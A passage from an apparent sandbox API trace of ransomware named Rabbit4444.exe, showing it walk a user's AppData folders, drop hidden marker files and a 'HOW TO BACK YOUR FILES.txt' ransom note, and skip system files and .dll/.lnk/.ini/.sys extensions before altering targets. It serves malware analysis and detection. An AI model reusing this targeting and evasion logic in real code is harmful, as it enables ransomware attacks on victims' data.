"c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secondarytileexperience_cw5n1h2txyewy\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.203] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.203] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.204] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.204] CloseHandle (hObject=0x2cc) returned 1 [0065.204] CloseHandle (hObject=0x2a0) returned 1 [0065.204] GetCurrentThreadId () returned 0xd98 [0065.204] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121fe8 [0065.204] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\TempState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\TempState" [0065.204] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11bc08 | out: hHeap=0xe0000) returned 1 [0065.204] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121fe0 | out: hHeap=0xe0000) returned 1 [0065.204] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\TempState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\TempState" [0065.204] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\TempState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\TempState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\TempState\\" [0065.204] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\TempState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3" [0065.204] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secondarytileexperience_cw5n1h2txyewy\\tempstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.208] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.211] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.211] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.212] CloseHandle (hObject=0x2a0) returned 1 [0065.212] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\TempState") returned 104 [0065.212] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.212] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\TempState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8336128a, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd111a2b6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf030cabe, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1026d0 [0065.212] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.212] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.212] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.212] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.213] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8336128a, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd111a2b6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf030cabe, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.213] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.213] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.213] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.213] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.213] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.213] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf030cabe, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf030cabe, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf030cabe, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.213] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.213] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.213] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf030cabe, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf030cabe, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf030cabe, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0065.213] FindClose (in: hFindFile=0x1026d0 | out: hFindFile=0x1026d0) returned 1 [0065.213] lstrcpyW (in: lpString1=0x130ec0a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.213] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\TempState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secondarytileexperience_cw5n1h2txyewy\\tempstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.214] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.214] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.214] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.218] CloseHandle (hObject=0x2cc) returned 1 [0065.218] CloseHandle (hObject=0x2a0) returned 1 [0065.218] GetCurrentThreadId () returned 0xd98 [0065.218] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122248 [0065.218] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\SystemAppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\SystemAppData" [0065.218] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x125658 | out: hHeap=0xe0000) returned 1 [0065.218] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122240 | out: hHeap=0xe0000) returned 1 [0065.218] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\SystemAppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\SystemAppData" [0065.218] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\SystemAppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\SystemAppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\SystemAppData\\" [0065.218] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\SystemAppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3" [0065.219] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secondarytileexperience_cw5n1h2txyewy\\systemappdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.220] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.222] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.223] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.223] CloseHandle (hObject=0x2a0) returned 1 [0065.224] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\SystemAppData") returned 108 [0065.224] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.224] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\SystemAppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x70e206ba, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x70e206ba, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0332c2e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102990 [0065.224] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.224] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.224] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.224] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.224] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x70e206ba, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x70e206ba, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0332c2e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.224] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.224] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.224] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.224] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.224] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.224] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0332c2e, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0332c2e, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0332c2e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.224] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.224] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.224] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0332c2e, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0332c2e, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0332c2e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0065.225] FindClose (in: hFindFile=0x102990 | out: hFindFile=0x102990) returned 1 [0065.225] lstrcpyW (in: lpString1=0x130ec12, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.225] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\SystemAppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secondarytileexperience_cw5n1h2txyewy\\systemappdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.225] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.225] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.225] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.226] CloseHandle (hObject=0x2cc) returned 1 [0065.226] CloseHandle (hObject=0x2a0) returned 1 [0065.226] GetCurrentThreadId () returned 0xd98 [0065.226] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122228 [0065.226] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Settings", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Settings" [0065.226] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108838 | out: hHeap=0xe0000) returned 1 [0065.226] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122220 | out: hHeap=0xe0000) returned 1 [0065.226] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Settings" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Settings" [0065.226] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Settings", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Settings\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Settings\\" [0065.226] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Settings\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3" [0065.226] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secondarytileexperience_cw5n1h2txyewy\\settings\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.229] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.232] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.232] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.233] CloseHandle (hObject=0x2a0) returned 1 [0065.233] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Settings") returned 103 [0065.233] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.233] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Settings\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x833ad684, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x712f2959, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xf0332c2e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a90 [0065.233] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.233] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.233] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.233] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.233] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x833ad684, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x712f2959, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xf0332c2e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.233] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.233] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.233] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.233] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.234] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.234] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0332c2e, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0332c2e, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0332c2e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.234] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.234] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.234] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x833ad684, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x833ad684, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x833ad684, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0065.234] lstrcmpiW (lpString1="roaming.lock", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.234] lstrcmpiW (lpString1="roaming.lock", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.234] lstrcmpiW (lpString1="roaming.lock", lpString2="Rabbit4444.exe") returned 1 [0065.234] lstrcmpiW (lpString1="roaming.lock", lpString2=".") returned 1 [0065.234] lstrcmpiW (lpString1="roaming.lock", lpString2="..") returned 1 [0065.234] lstrcmpiW (lpString1="roaming.lock", lpString2="windows") returned -1 [0065.234] lstrcmpiW (lpString1="roaming.lock", lpString2="bootmgr") returned 1 [0065.234] lstrcmpiW (lpString1="roaming.lock", lpString2="pagefile.sys") returned 1 [0065.234] lstrcmpiW (lpString1="roaming.lock", lpString2="boot") returned 1 [0065.234] lstrcmpiW (lpString1="roaming.lock", lpString2="ids.txt") returned 1 [0065.234] lstrcmpiW (lpString1="roaming.lock", lpString2="NTUSER.DAT") returned 1 [0065.234] lstrcpyW (in: lpString1=0x130ec08, lpString2="roaming.lock" | out: lpString1="roaming.lock") returned="roaming.lock" [0065.234] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Settings\\roaming.lock", dwFileAttributes=0x0) returned 1 [0065.235] lstrlenW (lpString="roaming.lock") returned 12 [0065.235] lstrlenW (lpString="Rabbit4444") returned 10 [0065.235] lstrcmpiW (lpString1="aming.lock", lpString2="Rabbit4444") returned -1 [0065.235] lstrlenW (lpString=".dll") returned 4 [0065.235] lstrcmpiW (lpString1="lock", lpString2=".dll") returned 1 [0065.235] lstrlenW (lpString=".lnk") returned 4 [0065.235] lstrcmpiW (lpString1="lock", lpString2=".lnk") returned 1 [0065.235] lstrlenW (lpString=".ini") returned 4 [0065.235] lstrcmpiW (lpString1="lock", lpString2=".ini") returned 1 [0065.235] lstrlenW (lpString=".sys") returned 4 [0065.235] lstrcmpiW (lpString1="lock", lpString2=".sys") returned 1 [0065.235] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x833ad684, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x70e206ba, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xd993ac7b, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat", 